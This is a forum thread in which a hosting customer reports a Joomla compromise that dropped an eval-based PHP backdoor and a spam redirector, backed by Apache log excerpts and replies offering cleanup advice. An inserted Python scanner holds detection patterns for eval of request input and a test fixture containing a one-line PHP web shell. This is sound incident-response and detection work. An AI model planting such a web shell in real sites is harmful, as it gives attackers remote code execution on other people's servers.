  1. #1

    Info on recent hack

    This morning I found 3000 bounce messages in my spam folder. They were being sent from a script running on a customer's account. I dove into it. Keep in mind I'm kind of a Linux newb.

    The customer is using Joomla (the only Joomla install on my VPS).

    The script had an owner of nobody, and I did not find anything in the FTP log. Customer says he has not touched the site in a year. This tells me it was some sort of web based attack, not an account compromise.

    The script was found in /modules/mod_osdonate/elements/murmur

    There were two files in the murmur directory. One was an obfuscated HTML file with JavaScript that redirected the client to drugstorephotos.at. I found in the bounced mails that the emails contained a link to /modules/mod_osdonate/xxx/yyy on other people's servers, so it seems to use a random link from other hacked servers.

    The other file was an obfuscated but simple PHP file that allowed the contents of a POST to the file to be eval'd.


    I started looking around and found this in the log:
    Code:
    71.236.157.105 - - [06/Apr/2011:15:06:47 -0700] "POST /modules/mod_osdonate/mod_osdonate.php HTTP/1.1" 200 23723 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; ri:1974424; InfoPath.2;  MAXTHON 2.0)"
    71.236.157.105 - - [06/Apr/2011:15:06:49 -0700] "GET /modules/mod_osdonate/reader.php HTTP/1.1" 200 88 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; ri:1974424; InfoPath.2;  MAXTHON 2.0)"
    This entry has the same timestamp as the mod_osdonate directory. It's the only one in the log with that IP, and there were no other log entries for 3 hours before and 12 hours after. The IP is a Comcast IP.


    Two days later (today) I found this:
    Code:
    223.25.242.94 - - [08/Apr/2011:00:58:08 -0700] "POST /modules/mod_osdonate/mod_osdonate.php HTTP/1.1" 200 14067 "-" "-"
    223.25.242.94 - - [08/Apr/2011:00:58:09 -0700] "POST /modules/mod_osdonate/mod_osdonate.php HTTP/1.1" 200 11326 "-" "-"
    223.25.242.94 - - [08/Apr/2011:00:58:10 -0700] "POST /modules/mod_osdonate/mod_osdonate.php HTTP/1.1" 200 11854 "-" "-"
    223.25.242.94 - - [08/Apr/2011:00:58:11 -0700] "POST /modules/mod_osdonate/mod_osdonate.php HTTP/1.1" 200 10352 "-" "-"
    223.25.242.94 - - [08/Apr/2011:00:58:12 -0700] "POST /modules/mod_osdonate/mod_osdonate.php HTTP/1.1" 200 8848 "-" "-"
    223.25.242.94 - - [08/Apr/2011:00:58:13 -0700] "POST /modules/mod_osdonate/mod_osdonate.php HTTP/1.1" 200 8864 "-" "-"
    223.25.242.94 - - [08/Apr/2011:00:58:14 -0700] "POST /modules/mod_osdonate/mod_osdonate.php HTTP/1.1" 200 8293 "-" "-"
    223.25.242.94 - - [08/Apr/2011:00:58:15 -0700] "POST /modules/mod_osdonate/mod_osdonate.php HTTP/1.1" 200 8418 "-" "-"
    223.25.242.94 - - [08/Apr/2011:00:58:15 -0700] "GET /modules/mod_osdonate/elements/murmur/confidence.html HTTP/1.1" 200 1345 "-" "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; eng; rv:1.8.0.5) Gecko/20060706 Firefox/2.0.0.5"
    223.25.242.94 - - [08/Apr/2011:00:58:16 -0700] "GET /modules/mod_osdonate/elements/murmur/wood.php?part=sec HTTP/1.1" 200 8 "-" "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; eng; rv:1.8.0.5) Gecko/20060706 Firefox/2.0.0.5"
    223.25.242.94 - - [08/Apr/2011:01:24:38 -0700] "POST /modules/mod_osdonate/elements/murmur/wood.php HTTP/1.0" 200 4 "-" "Mozilla/5.0"
    223.25.242.94 - - [08/Apr/2011:01:24:42 -0700] "POST /modules/mod_osdonate/elements/murmur/wood.php HTTP/1.0" 200 5 "-" "Mozilla/5.0"
    223.25.242.94 - - [08/Apr/2011:01:28:14 -0700] "POST /modules/mod_osdonate/elements/murmur/wood.php HTTP/1.0" 200 4 "-" "Mozilla/5.0"
    223.25.242.94 - - [08/Apr/2011:01:28:18 -0700] "POST /modules/mod_osdonate/elements/murmur/wood.php HTTP/1.0" 200 5 "-" "Mozilla/5.0"
    223.25.242.94 - - [08/Apr/2011:01:31:48 -0700] "POST /modules/mod_osdonate/elements/murmur/wood.php HTTP/1.0" 200 4 "-" "Mozilla/5.0"
    223.25.242.94 - - [08/Apr/2011:01:31:52 -0700] "POST /modules/mod_osdonate/elements/murmur/wood.php HTTP/1.0" 200 5 "-" "Mozilla/5.0"
    223.25.242.94 - - [08/Apr/2011:01:35:18 -0700] "POST /modules/mod_osdonate/elements/murmur/wood.php HTTP/1.0" 200 4 "-" "Mozilla/5.0"
    223.25.242.94 - - [08/Apr/2011:01:35:19 -0700] "POST /modules/mod_osdonate/elements/murmur/wood.php HTTP/1.0" 200 5 "-" "Mozilla/5.0"

    The entries continue until I killed it nearly 10 hours later. IP is from Malaysia.

    So now what? Any ideas on figuring out how they got in?


    cPanel cron checks for scripts that send mail, but to me finding scripts that eval is much worse. Anyone know what script does the searching for mail (newmailcgi) in the cron so I can update it to search for eval? Or any other tips? Anyone seen this before? This is my first compromise and it makes me feel like I shouldn't be running a VPS. lol.


    -Mike
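One way to do the eval search Mike asks about, as an added example that is not part of this thread, cPanel or Joomla: a Python triage script that walks a web root, flags PHP files where eval()/assert() is applied to request input or to a decoded blob, and reports each file's owner and mtime so a file owned by nobody with a fresh timestamp stands out. The match patterns, the sample web root and the file names in build_sample_tree() are constructed for this example.

```python
import os
import pwd
import re
import tempfile
from datetime import datetime, timezone

# Triage patterns (constructed for this example): eval/assert fed straight
# from request input, or eval of a decoded blob.
SUSPICIOUS = [
    (re.compile(r"\b(eval|assert)\s*\(\s*@?\$_(POST|GET|REQUEST|COOKIE)\b", re.I),
     "eval of request input"),
    (re.compile(r"\beval\s*\(\s*(base64_decode|gzinflate|str_rot13)\s*\(", re.I),
     "eval of decoded payload"),
]

def scan_php_file(path):
    # Return a finding dict for one file, or None if nothing matched.
    with open(path, "rb") as fh:
        text = fh.read().decode("latin-1")  # never fail on odd bytes
    hits = [label for rx, label in SUSPICIOUS if rx.search(text)]
    if not hits:
        return None
    st = os.stat(path)
    try:
        owner = pwd.getpwuid(st.st_uid).pw_name  # "nobody" is the tell here
    except KeyError:
        owner = str(st.st_uid)
    mtime = datetime.fromtimestamp(st.st_mtime, timezone.utc).isoformat()
    return {"path": path, "owner": owner, "mtime": mtime, "hits": hits}

def scan_php_tree(root):
    # Walk a web root; collect findings for every .php/.phtml file, sorted by path.
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith((".php", ".phtml")):
                hit = scan_php_file(os.path.join(dirpath, name))
                if hit:
                    findings.append(hit)
    return sorted(findings, key=lambda f: f["path"])

def build_sample_tree():
    # Constructed sample web root: one clean module file, one dropped backdoor.
    root = tempfile.mkdtemp(prefix="webroot_")
    dropped = os.path.join(root, "modules", "mod_osdonate", "elements", "murmur")
    os.makedirs(dropped)
    with open(os.path.join(root, "modules", "mod_osdonate", "mod_osdonate.php"), "w") as fh:
        fh.write("<?php defined('_JEXEC') or die; echo $params->get('text'); ?>\n")
    with open(os.path.join(dropped, "wood.php"), "w") as fh:
        fh.write("<?php @eval($_POST['part']); ?>\n")  # the shape the thread describes
    return root
```

Run it against a real web root with `scan_php_tree("/home/user/public_html")` and review any finding whose owner is the web server user rather than the account owner.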

  2. #2
    It has nothing to do with VPS security. Your VPS is probably just fine. The problem is with Joomla. Have you checked your client's site for bad permissions, exploits, old Joomla versions etc.?

  3. #3
    @turbo2ltr erase the malicious script or consider a fresh reinstall of Joomla. Tell your customer that he must use strong FTP passwords. Furthermore, install ClamAV on the server and perform a recursive scan of the directories. Cheers.

  4. #4
    It appears the compromised module is:
    http://joomlaguru.com.np/documentati.../osdonate.html

    I got the same link in a spam email, linking to /modules/mod_osdonate/bookmark.php. The thing is, the compromised website (a small static info site for a brick-and-mortar business) had no donate buttons anywhere. So I'm not sure if this module had been on there before and was then exploited, or if the hack injected this module or code disguised as this module.

  5. #5
    I reached out to the makers of osdonate to see if the module was compromised or if it was just completely replaced and just using the name, but they never got back to me. My customer wasn't using it either.
